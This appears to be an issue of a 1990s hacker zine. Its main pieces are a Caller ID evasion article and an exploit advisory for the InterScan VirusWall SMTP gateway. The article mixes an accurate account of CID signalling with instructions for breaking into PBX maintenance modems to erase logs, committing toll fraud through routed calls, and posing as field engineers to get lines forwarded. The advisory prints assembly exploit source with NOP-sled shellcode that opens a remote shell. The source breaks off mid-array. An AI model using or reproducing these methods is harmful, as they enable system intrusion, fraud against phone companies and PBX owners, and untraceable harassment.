appications perform are: -+ data build for new exchanges and major upgrades -+ generic network performance statistics by analysiing the large volume of data generated bt switches -+ providing national reference source for charging information, and associated validation tools to ensure charging integrety -+ provding a database and tracking mechanism for all exchange insident reports; and -+ a register of the hardware and software build levels for all exchanges in the network. DESS is a major system which runs on the largest VAX cluster configurations in the world. It supports a population of 2000 users, 140 of which may be similtaniously logged into the system. A typical daily workload for DESS would be analysing 1-4 Gigs of exchange generated data, producing 35 thousand pages of printout, and writing or reading 1500 exchange cartridges. COMMING SOON... NOMS INTERNAL NETWORKING OPER4TIONS. . . : | +----+ GBH -+o | +----> psyclone -+o +[ 4 HORSEMAN OF THE PSTN NINJ4 APPOCALIPZ ]+-- +----> hybrid -+o +[ GWAHN BURN'IN H4X0RZ ]+-- +----> gr1p -+o +----> kp -+o-----+[ _\|/_ ] | | : : . . -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ G ]-+ -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ B ]-+ -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ H ]-+ @HWA 44.0 Defeating the Caller ID system by Hybrid ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://hybrid.dtmf.org/ -o[ Defeating the Caller ID system ]o- -o[ D4RKCYDE ]o- -o[ by hybr1d ]o---------------------------------------- -----BEGIN PGP SIGNED MESSAGE----- Defeating The Caller ID System With Simple but Effective Stealth. July 1999. hybrid (hybrid@dtmf.org) (http://hybrid.dtmf.org) quick disclaimer: I do not encourage any of the information provided in this file. I, or f41th cannot be held responcerble for your use of the information provided in this article, it has been provided for informational purposes only. (introduction) CallerID (CID) or CND (Calling Number Delivery), is an extension to the widley used ANI (Automatic Number Identification) system. The telcos use ANI as a means for billing information when you make a toll-call, however dispite what alot of people think, ANI is not used as part of the CID system, it was the first system used to allow the recieving party know who was calling and was widely used before the advent of the SS7 telephony protocol, but sinse the implementation of SS7 CID/CND has become popular, both in residential subscriber loops, and commercial lines. In this file I am going to show how the CID/CND system works, specific to different *bell specifications aswell as the differences in other countrys, such as the UK. Before we go any further, you need to know the basics of the *bell CID protocol; CID information (data) is transmitted on the subscriber loop using a method known as FSK (Frequency Shift Keyed) modem tones. This data is transmitted in ASCII format and contains the information needed to display the CID mesage at the terminating line. The actual data burst occurs between the first and second ring of the line, and contains basic information about the originating point of the call, such as the date, time, and of course the calling number. On more upto date systems, or in a local area, the name of the caller will be displayed next to their number aswell. Further advances in CID include a new system called CIDCW or (CID on Call Waiting), where the call waiting tone is heard and the CID of the second calling person is exposed. (definition) As I said before, Caller ID is the identification of the originating subscriber line. For example, say you had a line installed under your own name, your details would be stored alongside your line information in your telcos directory listings. So when you call someone with a CID unit that displays the calling partys name, your name would be displayed alongside the number, or whoever pays the bill for the line. Obviously the telco has no real way of knowing just _who_ is making the call, so the term Caller ID would be inapropriate, and should technically be refered to as Calling Number Identification because it is the name of the person associate with the line rental, and not your docs that are transmitted. The actual CID information is transmitted to the terminating subscriber loop, as I said before, between the first and second ring implementing a bell202 type modem specification. There are 2 tones that are tranmitted, one of them contains the mark transmission (logic 1) and the other contains the space transmmision (logic 0), mark and space. The transmitted message contains a channel seizure string and then a mark string followed by the actual caller information. If the recieving line only has basic CID information installed (where they only recieve the date, time and number of the caller) SDMF (Single Data Message Format) is used in the CID data burst. If however, the recieving person has a more advanced version of CID where they can see the name of the person calling, MDMF (Multiple Data Message Format) is used in the data burst. If the MDMF method is used, and you have withheld your CID, the recieving line will only see a message saying the information was blocked by the caller, or is unavailable. Later I will discuss ways of making your line information completly unavailable to the called party. In New Jersey 1987, the first CID service was offered to subscribers of NJBell because NJBell where at that time implementing new high-speed networks and wanted to rake in a little more money by offering this new service to its customers. Before SS7 ANI was used as a means of obtaining the calling number info as a means for billing purposes on certain lines. Before SS7, your ANI would go no furthur than your central office, and would not be forwarded to international calls. However, that was then and this is now, SS7 has been implemented big time over the international/national PSTN (Public Switched Telephone Network) and ANI can be a phreaks worst enemy. These days ANI information can be transmitted internationaly, and in some cases globably, depending on the similaritys of the concerned signalling/switching systems. Numbers that are renowned for implementing full ANI capture are 800 and 900 services (full SS7 based) aswell as operator services, and of course 911. ANI is _completly_ different from CID, so if you call a line that has an ANI service installed, you will not be able to block your line information from going through as ANI works on a different protocol than CID, ie, the * services used to withhold your CID wont work on an ANI system because they are designed _only_ for blocking of CID _not_ ANI, remember they are completly different things. There are alot of rumours that I have heard from people about ANI, such as its supposid ability to capture your line information, which ever method you use to call a number. The fact is, ANI is dependant on SS7, which in turn is dependant on translation tables, who says you have to use the SS7 network to call someone ;> I'll go into this further later in this file. Now, back to CID; Because of the mass implementation of the SS7 protocol, CID informaion is transmitted to the called party's central office. This is done using SS7, and is called CPNM or (Calling Party Number Message). Now, heres the bitch of SS7; when you call someone, your line informaion is sent to the persons central office _regardless_ of the fact that you may have reqested that your line informaion is withheld. If you have withheld your CID, the remote person's central office still get your line information, but notices that you reqested that your info is withheld (UNLESS the person you are calling has a deal with their local telco to expose any CID information held at their central office to be automaticaly transmited to their CID unit, Thats where things begin to get nasty (at the end of the day, the telcos are more concerned about the money they are recieving for providing _full_ CID services to people, and could'nt care less if you reqested your line informaion remains private). (lets get technical) -- exphunged from CallerID specifications by Michael W. Slawson Eventually standard CID (SDMF) where only the calling number and date etc are displayed will be completly phased out and replace by the enhanced CNAM (Calling Name Delivery) where the MDMF data burst transmission is used. The CID information is sent serially at a rate of 1200 bits per second using continuous-phase binary frequency shift keying for modulation. The two frequencies used to represent the binary states are 1200 Hz for the Mark (logic 1) and 2200 Hz for the Space (logic 0). The data is sent asynchronously between the first and second ring at a signal level of -13.5 dBm. The level is measured at the central office across a 900 ohm test termination. Following a minimum of 500 ms after the end of the first ring, the sequence of transmission begins with a Channel Seizure. The Channel Seizure is a string of 300 continuous bits (250 ms) of alternating "0"s and "1"s. This string starts with a "0" and ends with a "1". A Mark Signal of 180 mark bits (150 ms) is sent immediately following the Channel Seizure Signal. The purpose of the Channel Seizure Signal and the Mark Signal is to prepare the data receiver in the Customer Premise Equipment (CPE) for the reception of the actual CID transmission. Once the Channel Seizure and Mark Signals have been sent the CID information is then transmitted starting with the Least Significant Bit (LSB) of the most significant character. This is true for both SDMF and MDMF. Each character in the message consists of 8 bits. For displayable characters these bits represent a code defined by the American Standard Code for Information Interchange. When transmitted the character's 8 bits are preceded by a start bit (space) and followed by a stop bit (mark) giving a total of 10 bits sent for each character. The CID information is followed by a checksum for error detection. Figure 1 shows a visual layout depicting the association of the 1st Ring, Channel Seizure Signal, Mark Signal, Caller ID information, Checksum, and the 2nd Ring. The checksum word is a twos complement of the modulo 256 sum of each bit in the other words of the message. The Channel Seizure and Mark Signals are not included in this checksum. When the message is received by the CPE it checks for errors by taking the received checksum word and adding the modulo 256 sum of all of the other words received in the message. The addition done by the CPE does not include the Channel Seizure and Mark Signals, nor does it include the received checksum word. The result of this addition should be zero to indicate that no errors have been detected. Figure 2 shows a CID message in SDMF. For ease in describing the process of determining the checksum, the decimal values will be used for the calculations. Character Decimal ASCII Actual Description Value Value Bits (LSB) - ------------------- ------- ----- --------------- Message Type (SDMF) 4 0 0 0 0 0 1 0 0 Message Length (9) 18 0 0 0 1 0 0 1 0 Month (December) 49 1 0 0 1 1 0 0 0 1 50 2 0 0 1 1 0 0 1 0 Day (25) 50 2 0 0 1 1 0 0 1 0 53 5 0 0 1 1 0 1 0 1 Hour (3pm) 49 1 0 0 1 1 0 0 0 1 53 5 0 0 1 1 0 1 0 1 Minutes (30) 51 3 0 0 1 1 0 0 1 1 48 0 0 0 1 1 0 0 0 0 Number (6061234567) 54 6 0 0 1 1 0 1 1 0 48 0 0 0 1 1 0 0 0 0 54 6 0 0 1 1 0 1 1 0 49 1 0 0 1 1 0 0 0 1 50 2 0 0 1 1 0 0 1 0 51 3 0 0 1 1 0 0 1 1 52 4 0 0 1 1 0 1 0 0 53 5 0 0 1 1 0 1 0 1 54 6 0 0 1 1 0 1 1 0 55 7 0 0 1 1 0 1 1 1 Checksum 79 0 1 0 0 1 1 1 1 The first step is to add up the values of all of the fields (not including the checksum). In this example the total would be 945. This total is then divided by 256. The quotient is discarded and the remainder (177) is the modulo 256 sum. The binary equivalent of 177 is 10110001. To get the twos compliment start with the ones compliment (01001110), which is obtained by inverting each bit, and add 1. The twos compliment of a binary 10110001 is 01001111 (decimal 79). This is the checksum that is sent at the end of the CID information. When the CPE receives the CID message it also does a modulo 256 sum of the fields, however it does not do a twos complement. If the twos complement of the modulo 256 sum (01001111) is added to just the modulo 256 sum (10110001) the result will be zero. If the result is not zero then the message is discarded. It is important to note that there is no error correction in this method. Even if the CPE were to notify the central office of errors, the central office will not retransmit the information. If an error is detected, the CPE receiving the message should display an error message or nothing at all. Although Bellcore SR-TSV-002476 recommends that the CPE display an error message if erroneous data is received, most CPE manufacturers have elected to just ignore the errored message. The content of the CID message itself depends on whether it is in SDMF or MDMF. A message in SDMF includes a Message Type word, a Message Length word, and the actual Message words. A message in MDMF also includes a Message Type word, a Message Length word, and the actual Message words, but additionally includes Parameter Type and Parameter Length words. There are certain points within these messages where up to 10 Mark bits may be inserted to allow for equipment delays in the central office. These Stuffed Mark bits are generally not necessary. The Message Type word defines whether the message is in SDMF or MDMF. It will be a binary 00000100 (decimal 4) for SDMF or a binary 10000000 (decimal 128) for MDMF. The Message Length will include the number of characters in the message. This length does not include the checksum at the end of the message. For SDMF the minimum length will be 9 characters. The minimum length for MDMF will depend on whether the customer has subscribed to CNAM service as well as CND. In the case of CND only the minimum length will be 13 characters. If the customer also has CNAM then the minimum will be 16 characters. In all three of the minimums mentioned there will be no actual number or name delivered. The field will be marked either "O" (Out of area) or "P" (Private). Figure 3 shows an example of a minimum message layout for SDMF. The number will not be delivered because it has been blocked by the calling party. The CPE will receive the date, time, and a "P" to indicate that the caller's identification has been blocked at the caller's request. Character Decimal ASCII Actual Description Value Value Bits (LSB) - ------------------- ------- ----- --------------- Message Type (SDMF) 4 0 0 0 0 0 1 0 0 Message Length (9) 9 0 0 0 0 1 0 0 1 Month (December) 49 1 0 0 1 1 0 0 0 1 50 2 0 0 1 1 0 0 1 0 Day (25) 50 2 0 0 1 1 0 0 1 0 53 5 0 0 1 1 0 1 0 1 Hour (3pm) 49 1 0 0 1 1 0 0 0 1 53 5 0 0 1 1 0 1 0 1 Minutes (30) 51 3 0 0 1 1 0 0 1 1 48 0 0 0 1 1 0 0 0 0 Private 80 P 0 1 0 1 0 0 0 0 Checksum 16 0 0 0 1 0 0 0 0 Character Decimal ASCII Actual Description Value Value Bits (LSB) - -------------------------- ------- ----- --------------- Message Type (MDMF) 128 1 0 0 0 0 0 0 0 Message Length (33) 33 0 0 1 0 0 0 0 1 Parameter Type (Date/Time) 1 0 0 0 0 0 0 0 1 Parameter Length (8) 8 0 0 0 0 1 0 0 0 Month (November) 49 1 0 0 1 1 0 0 0 1 49 1 0 0 1 1 0 0 0 1 Day (28) 50 2 0 0 1 1 0 0 1 0 56 8 0 0 1 1 1 0 0 0 Hour (3pm) 49 1 0 0 1 1 0 0 0 1 53 5 0 0 1 1 0 1 0 1 Minutes (43) 52 4 0 0 1 1 0 1 0 0 51 3 0 0 1 1 0 0 1 1 Parameter Type (Number) 2 0 0 0 0 0 0 1 0 Parameter Length (10) 10 0 0 0 0 1 0 1 0 Number (6062241359) 54 6 0 0 1 1 0 1 1 0 48 0 0 0 1 1 0 0 0 0 54 6 0 0 1 1 0 1 1 0 50 2 0 0 1 1 0 0 1 0 50 2 0 0 1 1 0 0 1 0 52 4 0 0 1 1 0 1 0 0 49 1 0 0 1 1 0 0 0 1 51 3 0 0 1 1 0 0 1 1 53 5 0 0 1 1 0 1 0 1 57 9 0 0 1 1 1 0 0 1 Parameter Type (Name) 7 0 0 0 0 0 1 1 1 Parameter Length (9) 9 0 0 0 0 1 0 0 1 Name (Joe Smith) 74 J 0 1 0 0 1 0 1 0 111 o 0 1 1 0 1 1 1 1 101 e 0 1 1 0 0 1 0 1 32 0 0 1 0 0 0 0 0 83 S 0 1 0 1 0 0 1 1 109 m 0 1 1 0 1 1 0 1 105 i 0 1 1 0 1 0 0 1 116 t 0 1 1 1 0 1 0 0 104 h 0 1 1 0 1 0 0 0 Checksum 88 0 1 0 1 1 0 0 0 In Figure 4, if the number and name had not been included then the parameter types for those fields would be different. These alternate parameter types are used to signify that the data contained in that parameter is the reason for its absence. The parameter type for the number section would have been a binary 00000100 (decimal 4) and the parameter type for the name section would have been a binary 00001000 (decimal 8). When the parameter type signifies that the data contained is the reason for that fields absence, the parameter length is always a binary 00000001 (decimal 1). If the reason for absence is that the calling party does not want their number/name displayed then the parameter data would be a binary 01010000 (ASCII "P") for Private. If the reason for absence is that the information is just not available then the parameter data would be a binary 01001111 (ASCII "O") for Out of area. The number/name may not be available if the calling party is not served by a central office capable of relaying the information on through the network. (lets talk d1rty) The above specifications are relevant to the US CID system, and not to the UK specification. Enough of the technical stuff for now though, its time to look at CID systems from an attack and deffense point of view. First the real basics; if you are in US you can reqest that your CID is withheld by using *67 as a prefix when dialing a number. As I said before though, this is absolutly usless in completly withholding your CID because we know that CID information is passed onto the called party's central office regardless of *67 via implementation of the SS7 network. If you are in the UK you would prefix your call with 141, but again our nice systemX digital exchanges a real bitches at passing on our CID information to _other_ exchanges, so in essance your call routing is loged as it passes through exchange boundarys on the PSTN. So here I am going to discuss different techniques that can be used to completly render your CID information useless as it is transmitted through various excahanges and offices. I'm going to begin with some basic concepts so you can understand the more advanced techniques better. Now, lets consider this scenario for the following techniques; You are in Texas (RBOC: SWBell) and you want to set-up a call to someone in Chicago (Ameritech). Obviously, you know that *67 wont help you if the person you are calling has full CID (or has access to there central office ;>) so you consider the following techniques and call-setup examples. [ example A: simple diverting ] Here you can use a host that will be traced back to in the advent that the person has full CID. In other words, its real simple, you use a PBX (preferably a long distance one located in another RBOC). This is very self explanitory, but alot of people get it wrong. Heres how the call setup would look in a metaphorical diagram: ______ ______ ______ | | | | | | (800)XXX-XXXX | CO |------------->| CO |------->| PBX | POTS:(123)456-7890 |______| |______|<-------|______| | | | | | __|___ ( you ) | | | CO |----------------------> ( them ) |______| Now, whats happening here is you are calling the PBX at *671800XXXXXXX, you then login to the PBX and from there you dial the person you want to call. When the person checks there CID unit, they will see the number of the PBX you are calling from instead of your actuall originating number. Now, this is OK for very very very simple CID spoofing, but if the person you are calling is resoursefull, they could very easily have words with the host from which you where calling from (who would have your ANI -its an 800 number) The CO of the PBX would also have the time, date, and trunk setup information for when you called the PBX etc, so this example is still not quite as effective as you would imagine it to be. Now, to make a long story short, we can enhacne the above method by implementing our _own_ CID blocking methods along the above routing example. Look at the diagram in detail, and you will realise that there can be many different alterations made that can make the routing alot safer, and _alot_ more hastle for them to pin-point your OCP, or originating point. First we take into account the call we make to the PBX. For starters, you can op-divert to the 800 number (depending on where you live) so the 800 PBX recieves operator assisted call ANI instead of yours. This can be done very easily, and involves you calling your local operator and asking them to call the number for you. The central office located near to the PBX then has the OPC of your operator, rather than you. Now, the PBX host is your safgaurd when it comes to hiding your CID. For those of you who dont know, all PBXs or privatly owned switching and trunking mechanisms/systems log incomming and outgoing trunk setups for billing purposses etc. These days, most PBX exchanges have administration modules that deal with call routing. The call-setups are stored in the databases of the PBXs and can be intercepted. Most of the time, a PBX will have 1 if not several dialin modems that connect to the PBX administration modules for remote maintanance. Its simply a case of internally scanning the extensions of the remote PBX for a carrier, and checking out each one until you find what you are looking for. Once you have access, you could do _many_ things depending on how advanced the system is. For example, you could erase any log of your connection to the PBX (aswell as any furture connections), you can set up incomming and outgoing trunks on the PBX exchange that dont even exist, you can also select which trunk you wish to call your party with and therefore selecting which number you wish to be displayed to the called party. I wont go into to much detail here, you get the picture right? So now we are using a host to call through that will not log anything that could point towards you, with the exeption of the timestamping at the central officess along the routing path. (again, that could be delt with in a similar fashion). You could also implement op-diverting from the PBX to the dialed person, or triple the amount of hosts you use to place the call at the same time using the above methods, but via more PBXs and operators. In my opinion though, the above method is no way near as secure as you need it to be, so in the next examples, we take adavntage of ld-carriers, and global PSTN networks that do not co-operate with each other, ie: calling party data is not translatable or transmitable (electromechanical). Now, to really throw someone off track in the advent of a trace (realtime or aftermath) we take advantage of one of the biggest flaws in the PSTN known today: new digital exchange units such as digital ESS, systemX etc cannot effectivly communicate with older lesser implemented electromechanical exchanges such as crossbar, and CCITT#5 protocols implemented in lesser developed countrys such as Indonisia, Libia etc. The worlds telcos are also very lazy when it comes to passing on originating calling party information from country to country, simply because it is to much hastle for them, time and money runs into the picture once more. So ld call setups become a good counter defense when it comes to routing un-traceable calls. Now, I can think of literaly 100s of methods that could be implemented here, but I'm going to discuss the structure of how this type of call would be setup, I'll leave the rest to your imagination (if you have one) [ example B: international routing ] Now, consider the previous call setup example, and imagine how it would be trunked if you placed a long distance barrier in-between. Here we will imagine we have 2 PBXs, one in the US and one in the UK. Again, you are in Texas and want to setup a call to someone in Chicago without revealing your identity. The basic call setup would appear like this: ______ ______ ______ | | | | | | (800)XXX-XXXX | CO |------------->| CO |------->| PBX | POTS:(123)456-7890 |______| |______|<-------|______| | | ___ | [ US PSTN ] | ESS routing .--->|co | | __|___ ____|_ |___|------ ( them ) ( you ) | | | | | CO |------->| DMS | (international DMS |______| |______| gateway router) : : : [ super LD ] .........................\........................ \ : So here you have op diverted : to the US PBX, then from the : US PBX op diverted and called ______ ___:__ the PBX in the UK, already | |------->| | the UK PBX has lost the US | CO |<-------| DMS | (international DMS PBXs CID, and from the UK PBX |______| |______| gateway router) you call the person in chicago, |: which in turn is re-routed back |: through the international PSTN |: [ UK PSTN ] systemx routing effectivly deteriating your __|:__ origionating line. | | | PBX | (UK PBX) |______| The problem with this kind of routing example is that you are costing the 2 PBX exchanges involved big bux, and is generaly not a very nice thing to do, heh. Again, as in the previous example, you can implement the PBX administration for extra security, the above diagram could be used vise-versa whether your origionating point was the UK or US. It is howver inconvinient, both for you, and for the poor owners of the PBXs who have to falk out for your toll-fraud adventures. There are however other ways of implementing the above techniques. Now, probably the most favourable technique to use would be to box your way out of a country that runs C5, and from there re-route a call back to the US and even implement a few PBXs along the way, therefore you would have [ 0 ] CID worrys. A more advanced technique involves the forwarding of subscriber lines to a designated number (A C5 country direct, PBX etc). Now, if you are in the US, you could be super lame and simply have another US line forwarded to another number via the means of posing to the forwarded lines co as a field engineer requesting a line be forwarded to xxx while you carry out field 'maintanance' on it, _or_ if you wanna stay away from the lameness, you could so this: Lets take Indonisia for example. You can remotely forward an Indonisian residential line to anywhere you want (providing you can find an english speaking exchange). Indonisia is just an example, but like the US method of forwarding lines you have 2 options. You could a) pose a local field engineer, or if the country has a DMS[+] architecture you could forward the lines via the means of remote switch access. (Thats another file, but you get the general idea). So, when it comes down to it, its all about having the ability to route calls, not spoof them. So, there you have it, a brief guide to CID blocking (the effective way), its your choice, *67 (blah) or *67,00-->1800XXXXXXX-->*67,00-->1800XXXXXX(CD)--> KP2-44-141-0800-XXXXXXX-ST -->001-1800XXXXXXX-->*67,00-->555-555-5555 hello? :> I hope you enjoyed this file as much as I did writing it, take it easy and remember to check out my website.. :) Shouts to 9x, substance, downtime, ch1ckie, oclet, jasun, zomba, psyclone, bodie, digiphreq, w1repa1r, gr1p, t1p, jorge, b4b0, shadowx, osiris, essgurl, lowtek, pbxphreak, katkilla, drphace, prez, euk, simmeth, dgtlfokus, voltage, : . http://hybrid.dtmf.org ___ ___ _____.___.____________________ ____________ hybrid@b4b0.org / | \\__ | |\______ \______ \/_ \______ \ hybrid@ninex.com / ~ \/ | | | | _/| _/ | || | \ hybrid@dtmf.org \ Y /\____ | | | \| | \ | || hy_ \ \___|_ / / ______| |______ /|____|_ / |___/_______ / +++ NO CARRIER \/ \/ : \/ \/ . \/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: cp850 iQEVAwUBN5dSy7TUyHciIYgJAQGcSgf/er3ngPoYsPon9rmU4VG0klcp9koc5aoA hBBheVxeeVQOzrUl0kPv5sCUPdHoEKbabHqAyDcoJY9feoM5aZ4U0kryuTBm415z M57ff31CH+T+8iUaW7ZlQkBfFuJfNr2B3pro6KvDGzU2S7nJhYSCugoCf3IExlLt +FSXEAl+HC0PCpDcEYlQ+2kNwgOBMLLQ9w3On/vFcRJnD26E9Hk4j5IMv8iv+37F sdQDDhqQ3ah2y1CN3KGAOrcsaYRhT1OyLjbw+JDwR1buCa38yqawBjpbAuM/PTfU eoNCmwzFEucjcFKpQJisT1428MgeuK2cWmIj8flfuIr9fhIi/7wdNA== =570J -----END PGP SIGNATURE----- @HWA 45.0 A buffer overflow exists on the VirusWall smtp gateway ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by duro A buffer overflow exists on the VirusWall smtp gateway - by sending a long HELO command you can overflow the buffer and execute arbitrary code. Example code has been written which will spawn a command prompt on a port you specify. Before you shrug this one off, take a look: Connected to mail1.microsoft.com. Escape character is '^]'. 220 mail1.microsoft.com InterScan VirusWall NT ESMTP 3.23 (build 9/10/99) ready at Sun, 07 Nov 1999 03:38:44 -0800 (Pacific Standard Time) The ironic thing here is, VirusWall was designed to prevent viruses and 'malicious code'. Obviously not a lot of thought was taken before laying their trust into 3rd party 'security' products. A quick note to the millions out there who would give their right arm to compromise microsofts network - sorry, their firewall would prevent the payload from spawning a remote shell.. unless of course it was modified to stop an existing service to open a port :) Exploit source and binary is available at http://www.beavuh.org. Credit to Liraz Siri for bringing this to our attention. Hi to eEye/w00w00/teso. ; Interscan VirusWall 3.23/3.3 remote. ; ; The binary is available at http://www.beavuh.org. ; ; To assemble: ; ; tasm32 -ml vwxploit.asm ; tlink32 -Tpe -c -x vwxploit.obj ,,, import32 ; ; TASM 5 required! ; ; dark spyrit .386p locals jumps .model flat, stdcall extrn GetCommandLineA:PROC extrn GetStdHandle:PROC extrn WriteConsoleA:PROC extrn ExitProcess:PROC extrn WSAStartup:PROC extrn connect:PROC extrn send:PROC extrn recv:PROC extrn WSACleanup:PROC extrn gethostbyname:PROC extrn htons:PROC extrn socket:PROC extrn inet_addr:PROC extrn closesocket:PROC extrn Sleep:PROC .data sploit_length323 equ 1314 sploit323: db 068h, 065h, 06ch, 06fh, 020h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 0bbh, 010h, 00bh, 011h, 001h, 0c1h, 0ebh db 002h, 08bh, 0f8h, 033h, 0c0h, 050h, 048h, 090h, 050h, 059h, 0f2h, 0afh db 059h, 0b1h, 0c6h, 08bh, 0c7h, 048h, 080h, 030h, 099h, 0e2h, 0fah, 033h db 0f6h, 096h, 090h, 090h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h db 0b1h, 00bh, 049h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h db 056h, 052h, 066h, 0bbh, 034h, 043h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h db 0ech, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 066h, 0bbh, 0c4h, 042h db 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 006h, 032h, 0c0h db 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h, 066h, 0bbh, 034h db 043h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 083h, 0c6h, 005h, 033h db 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h, 0e8h, 093h, 06ah, 010h db 056h, 053h, 0ffh, 057h, 0ech, 06ah, 002h, 